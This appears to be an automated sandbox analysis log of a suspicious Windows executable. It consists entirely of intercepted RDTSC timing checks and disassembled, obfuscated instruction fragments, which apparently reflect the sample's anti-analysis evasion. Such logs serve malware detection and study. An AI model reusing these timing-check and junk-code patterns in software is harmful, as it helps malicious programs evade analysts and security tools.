                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe RDTSC instruction interceptor: First address: 77B853 second address: 77B871 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007FF628D73F69h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe RDTSC instruction interceptor: First address: 77D81C second address: 77D82A instructions: 0x00000000 rdtsc 0x00000002 ja 00007FF628B69586h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe RDTSC instruction interceptor: First address: 77F25F second address: 77F269 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF628D73F56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe RDTSC instruction interceptor: First address: 77F30B second address: 77F312 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe RDTSC instruction interceptor: First address: 77F3AF second address: 77F3B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe RDTSC instruction interceptor: First address: 77F49F second address: 77F4A9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe RDTSC instruction interceptor: First address: 77F9B9 second address: 77F9E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 mov dword ptr [esp], ebx 0x00000009 add esi, 440095CAh 0x0000000f nop 0x00000010 push esi 0x00000011 pushad 0x00000012 je 00007FF628D73F56h 0x00000018 push edi 0x00000019 pop edi 0x0000001a popad 0x0000001b pop esi 0x0000001c push eax 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FF628D73F60h 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe RDTSC instruction interceptor: First address: 77FBF5 second address: 77FBFA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe RDTSC instruction interceptor: First address: 77FEB2 second address: 77FEB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe RDTSC instruction interceptor: First address: 77FEB6 second address: 77FEBA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe RDTSC instruction interceptor: First address: 780041 second address: 780047 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe RDTSC instruction interceptor: First address: 782813 second address: 78281D instructions: 0x00000000 rdtsc 0x00000002 jno 00007FF628B69586h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe RDTSC instruction interceptor: First address: 78281D second address: 782823 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe RDTSC instruction interceptor: First address: 782823 second address: 78283D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FF628B6958Fh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe RDTSC instruction interceptor: First address: 78283D second address: 782843 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe RDTSC instruction interceptor: First address: 782843 second address: 782847 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe RDTSC instruction interceptor: First address: 7854AF second address: 78553F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop ecx 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push ebp 0x0000000e call 00007FF628D73F58h 0x00000013 pop ebp 0x00000014 mov dword ptr [esp+04h], ebp 0x00000018 add dword ptr [esp+04h], 0000001Bh 0x00000020 inc ebp 0x00000021 push ebp 0x00000022 ret 0x00000023 pop ebp 0x00000024 ret 0x00000025 push 00000000h 0x00000027 push 00000000h 0x00000029 push eax 0x0000002a call 00007FF628D73F58h 0x0000002f pop eax 0x00000030 mov dword ptr [esp+04h], eax 0x00000034 add dword ptr [esp+04h], 00000018h 0x0000003c inc eax 0x0000003d push eax 0x0000003e ret 0x0000003f pop eax 0x00000040 ret 0x00000041 jnl 00007FF628D73F68h 0x00000047 or dword ptr [ebp+12489FB1h], edi 0x0000004d push 00000000h 0x0000004f xor si, 812Ah 0x00000054 xchg eax, ebx 0x00000055 pushad 0x00000056 jo 00007FF628D73F58h 0x0000005c pushad 0x0000005d popad 0x0000005e push eax 0x0000005f push edx 0x00000060 jmp 00007FF628D73F5Fh 0x00000065 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe RDTSC instruction interceptor: First address: 78553F second address: 785543 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe RDTSC instruction interceptor: First address: 78905B second address: 789060 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe RDTSC instruction interceptor: First address: 785C8A second address: 785C90 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe RDTSC instruction interceptor: First address: 785C90 second address: 785C94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe RDTSC instruction interceptor: First address: 785C94 second address: 785CA5 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF628B69586h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe RDTSC instruction interceptor: First address: 740D08 second address: 740D1C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF628D73F60h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe RDTSC instruction interceptor: First address: 78BABF second address: 78BB36 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF628B6958Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007FF628B69597h 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push ebp 0x00000014 call 00007FF628B69588h 0x00000019 pop ebp 0x0000001a mov dword ptr [esp+04h], ebp 0x0000001e add dword ptr [esp+04h], 00000018h 0x00000026 inc ebp 0x00000027 push ebp 0x00000028 ret 0x00000029 pop ebp 0x0000002a ret 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push eax 0x00000030 call 00007FF628B69588h 0x00000035 pop eax 0x00000036 mov dword ptr [esp+04h], eax 0x0000003a add dword ptr [esp+04h], 00000015h 0x00000042 inc eax 0x00000043 push eax 0x00000044 ret 0x00000045 pop eax 0x00000046 ret 0x00000047 mov dword ptr [ebp+122D23E3h], ebx 0x0000004d cld 0x0000004e push eax 0x0000004f push eax 0x00000050 push edx 0x00000051 pushad 0x00000052 push edi 0x00000053 pop edi 0x00000054 push eax 0x00000055 push edx 0x00000056 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe RDTSC instruction interceptor: First address: 78BB36 second address: 78BB3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe RDTSC instruction interceptor: First address: 78CA60 second address: 78CAB2 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FF628B6958Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d mov edi, 6C109E01h 0x00000012 mov edi, edx 0x00000014 push 00000000h 0x00000016 jmp 00007FF628B6958Dh 0x0000001b push 00000000h 0x0000001d jnc 00007FF628B69597h 0x00000023 xchg eax, esi 0x00000024 push ecx 0x00000025 pushad 0x00000026 jmp 00007FF628B6958Bh 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe RDTSC instruction interceptor: First address: 78BD0C second address: 78BD17 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007FF628D73F56h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe RDTSC instruction interceptor: First address: 78CAB2 second address: 78CAD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 pushad 0x00000008 jmp 00007FF628B69595h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe RDTSC instruction interceptor: First address: 78BD17 second address: 78BD96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 mov edi, dword ptr [ebp+122D2BF9h] 0x0000000e push dword ptr fs:[00000000h] 0x00000015 push 00000000h 0x00000017 push ebx 0x00000018 call 00007FF628D73F58h 0x0000001d pop ebx 0x0000001e mov dword ptr [esp+04h], ebx 0x00000022 add dword ptr [esp+04h], 0000001Bh 0x0000002a inc ebx 0x0000002b push ebx 0x0000002c ret 0x0000002d pop ebx 0x0000002e ret 0x0000002f push esi 0x00000030 cld 0x00000031 pop ebx 0x00000032 mov dword ptr fs:[00000000h], esp 0x00000039 call 00007FF628D73F62h 0x0000003e mov ebx, dword ptr [ebp+122D3706h] 0x00000044 pop edi 0x00000045 mov eax, dword ptr [ebp+122D0C9Dh] 0x0000004b movsx ebx, ax 0x0000004e push FFFFFFFFh 0x00000050 jmp 00007FF628D73F63h 0x00000055 nop 0x00000056 push eax 0x00000057 push edx 0x00000058 pushad 0x00000059 push eax 0x0000005a push edx 0x0000005b rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe RDTSC instruction interceptor: First address: 78BD96 second address: 78BD9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe RDTSC instruction interceptor: First address: 78EA5F second address: 78EA64 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe RDTSC instruction interceptor: First address: 78EA64 second address: 78EACF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007FF628B69588h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 0000001Bh 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 mov edi, dword ptr [ebp+122D3624h] 0x0000002a push 00000000h 0x0000002c sub ebx, 27E4C14Ah 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push edx 0x00000037 call 00007FF628B69588h 0x0000003c pop edx 0x0000003d mov dword ptr [esp+04h], edx 0x00000041 add dword ptr [esp+04h], 0000001Bh 0x00000049 inc edx 0x0000004a push edx 0x0000004b ret 0x0000004c pop edx 0x0000004d ret 0x0000004e mov bx, 385Bh 0x00000052 push eax 0x00000053 push eax 0x00000054 push edx 0x00000055 push eax 0x00000056 push edx 0x00000057 push eax 0x00000058 push edx 0x00000059 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe RDTSC instruction interceptor: First address: 78EACF second address: 78EAD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe RDTSC instruction interceptor: First address: 78EAD3 second address: 78EAE2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF628B6958Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe RDTSC instruction interceptor: First address: 78EAE2 second address: 78EAEC instructions: 0x00000000 rdtsc 0x00000002 je 00007FF628D73F5Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe RDTSC instruction interceptor: First address: 78FADA second address: 78FAE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe RDTSC instruction interceptor: First address: 78FAE1 second address: 78FB00 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FF628D73F65h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe RDTSC instruction interceptor: First address: 78FB00 second address: 78FB18 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FF628B69590h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe RDTSC instruction interceptor: First address: 78FB18 second address: 78FB1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe RDTSC instruction interceptor: First address: 78FB1C second address: 78FB97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebx 0x0000000b call 00007FF628B69588h 0x00000010 pop ebx 0x00000011 mov dword ptr [esp+04h], ebx 0x00000015 add dword ptr [esp+04h], 00000017h 0x0000001d inc ebx 0x0000001e push ebx 0x0000001f ret 0x00000020 pop ebx 0x00000021 ret 0x00000022 mov dword ptr [ebp+122D229Ch], esi 0x00000028 push 00000000h 0x0000002a mov di, F8D4h 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push edi 0x00000033 call 00007FF628B69588h 0x00000038 pop edi 0x00000039 mov dword ptr [esp+04h], edi 0x0000003d add dword ptr [esp+04h], 0000001Ch 0x00000045 inc edi 0x00000046 push edi 0x00000047 ret 0x00000048 pop edi 0x00000049 ret 0x0000004a pushad 0x0000004b mov bx, 5424h 0x0000004f mov cx, ax 0x00000052 popad 0x00000053 mov dword ptr [ebp+124558D5h], ecx 0x00000059 xchg eax, esi 0x0000005a push eax 0x0000005b push edx 0x0000005c pushad 0x0000005d jmp 00007FF628B6958Dh 0x00000062 push eax 0x00000063 push edx 0x00000064 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe RDTSC instruction interceptor: First address: 78FB97 second address: 78FB9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe RDTSC instruction interceptor: First address: 78FB9C second address: 78FBA6 instructions: 0x00000000 rdtsc 0x00000002 je 00007FF628B6958Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe RDTSC instruction interceptor: First address: 78FD06 second address: 78FD0C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe RDTSC instruction interceptor: First address: 78FD0C second address: 78FD29 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF628B6958Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ebx 0x0000000b je 00007FF628B6958Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe RDTSC instruction interceptor: First address: 78FD29 second address: 78FDCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 nop 0x00000006 mov ebx, 7DD6FA9Bh 0x0000000b push dword ptr fs:[00000000h] 0x00000012 mov dword ptr [ebp+12460BE0h], ebx 0x00000018 mov ebx, dword ptr [ebp+122D2EF9h] 0x0000001e mov dword ptr fs:[00000000h], esp 0x00000025 push 00000000h 0x00000027 push ecx 0x00000028 call 00007FF628D73F58h 0x0000002d pop ecx 0x0000002e mov dword ptr [esp+04h], ecx 0x00000032 add dword ptr [esp+04h], 0000001Ch 0x0000003a inc ecx 0x0000003b push ecx 0x0000003c ret 0x0000003d pop ecx 0x0000003e ret 0x0000003f sub dword ptr [ebp+122D2226h], edx 0x00000045 mov eax, dword ptr [ebp+122D0CE5h] 0x0000004b push 00000000h 0x0000004d push edx 0x0000004e call 00007FF628D73F58h 0x00000053 pop edx 0x00000054 mov dword ptr [esp+04h], edx 0x00000058 add dword ptr [esp+04h], 0000001Bh 0x00000060 inc edx 0x00000061 push edx 0x00000062 ret 0x00000063 pop edx 0x00000064 ret 0x00000065 jmp 00007FF628D73F65h 0x0000006a push FFFFFFFFh 0x0000006c mov dword ptr [ebp+122D2157h], ebx 0x00000072 mov dword ptr [ebp+12489CF0h], ebx 0x00000078 push eax 0x00000079 push eax 0x0000007a push edx 0x0000007b push eax 0x0000007c push edx 0x0000007d push eax 0x0000007e push edx 0x0000007f rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe RDTSC instruction interceptor: First address: 78FDCB second address: 78FDCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe RDTSC instruction interceptor: First address: 78FDCF second address: 78FDD5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe RDTSC instruction interceptor: First address: 78FDD5 second address: 78FDDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FF628B69586h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe RDTSC instruction interceptor: First address: 7929FC second address: 792A01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe RDTSC instruction interceptor: First address: 792A01 second address: 792A74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push edi 0x0000000b call 00007FF628B69588h 0x00000010 pop edi 0x00000011 mov dword ptr [esp+04h], edi 0x00000015 add dword ptr [esp+04h], 00000018h 0x0000001d inc edi 0x0000001e push edi 0x0000001f ret 0x00000020 pop edi 0x00000021 ret 0x00000022 mov dword ptr [ebp+122D2226h], ecx 0x00000028 push 00000000h 0x0000002a call 00007FF628B6958Bh 0x0000002f mov di, F4FCh 0x00000033 pop ebx 0x00000034 push 00000000h 0x00000036 push 00000000h 0x00000038 push eax 0x00000039 call 00007FF628B69588h 0x0000003e pop eax 0x0000003f mov dword ptr [esp+04h], eax 0x00000043 add dword ptr [esp+04h], 0000001Ch 0x0000004b inc eax 0x0000004c push eax 0x0000004d ret 0x0000004e pop eax 0x0000004f ret 0x00000050 movzx edi, di 0x00000053 push eax 0x00000054 js 00007FF628B6958Eh 0x0000005a push edi 0x0000005b push eax 0x0000005c push edx 0x0000005d rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe RDTSC instruction interceptor: First address: 793AE8 second address: 793AF9 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FF628D73F56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe RDTSC instruction interceptor: First address: 793AF9 second address: 793B51 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FF628B69599h 0x0000000c push eax 0x0000000d pop eax 0x0000000e popad 0x0000000f popad 0x00000010 nop 0x00000011 mov dword ptr [ebp+122D36FEh], ecx 0x00000017 mov ebx, dword ptr [ebp+122D360Dh] 0x0000001d push 00000000h 0x0000001f pushad 0x00000020 xor dword ptr [ebp+122D211Eh], eax 0x00000026 movsx ecx, si 0x00000029 popad 0x0000002a push 00000000h 0x0000002c mov ebx, 02264D3Bh 0x00000031 xchg eax, esi 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007FF628B69590h 0x00000039 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe RDTSC instruction interceptor: First address: 793B51 second address: 793B57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe RDTSC instruction interceptor: First address: 793B57 second address: 793B80 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF628B69599h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edi 0x0000000d jo 00007FF628B6958Ch 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe RDTSC instruction interceptor: First address: 796CA4 second address: 796CA9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe RDTSC instruction interceptor: First address: 796CA9 second address: 796D23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FF628B69586h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e ja 00007FF628B6958Ah 0x00000014 nop 0x00000015 call 00007FF628B69590h 0x0000001a jng 00007FF628B6959Fh 0x00000020 pop ebx 0x00000021 push 00000000h 0x00000023 push 00000000h 0x00000025 push ebx 0x00000026 call 00007FF628B69588h 0x0000002b pop ebx 0x0000002c mov dword ptr [esp+04h], ebx 0x00000030 add dword ptr [esp+04h], 0000001Ah 0x00000038 inc ebx 0x00000039 push ebx 0x0000003a ret 0x0000003b pop ebx 0x0000003c ret 0x0000003d push 00000000h 0x0000003f mov edi, 030433AFh 0x00000044 xchg eax, esi 0x00000045 push esi 0x00000046 push eax 0x00000047 push edx 0x00000048 push eax 0x00000049 push edx 0x0000004a rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe RDTSC instruction interceptor: First address: 796D23 second address: 796D27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe RDTSC instruction interceptor: First address: 796D27 second address: 796D2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe RDTSC instruction interceptor: First address: 796D2B second address: 796D40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FF628D73F5Bh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe RDTSC instruction interceptor: First address: 793DCC second address: 793DE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jng 00007FF628B6958Ch 0x00000010 jng 00007FF628B69586h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe RDTSC instruction interceptor: First address: 794D9F second address: 794DA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe RDTSC instruction interceptor: First address: 792C73 second address: 792C77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe RDTSC instruction interceptor: First address: 797DE0 second address: 797DEA instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF628D73F5Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe RDTSC instruction interceptor: First address: 79905B second address: 799060 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe RDTSC instruction interceptor: First address: 799F73 second address: 799F77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe RDTSC instruction interceptor: First address: 79C931 second address: 79C94E instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF628B69586h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FF628B69593h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe RDTSC instruction interceptor: First address: 79C94E second address: 79C967 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF628D73F65h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe RDTSC instruction interceptor: First address: 79C967 second address: 79C96B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe RDTSC instruction interceptor: First address: 79C96B second address: 79C99B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF628D73F68h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d jng 00007FF628D73F7Ah 0x00000013 push eax 0x00000014 push edx 0x00000015 jo 00007FF628D73F56h 0x0000001b push ebx 0x0000001c pop ebx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe RDTSC instruction interceptor: First address: 79C99B second address: 79C99F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe RDTSC instruction interceptor: First address: 7A1F9E second address: 7A1FA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe RDTSC instruction interceptor: First address: 7A1FA2 second address: 7A1FC6 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FF628B69586h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jnl 00007FF628B6958Eh 0x00000012 pop eax 0x00000013 pushad 0x00000014 jp 00007FF628B6958Ch 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
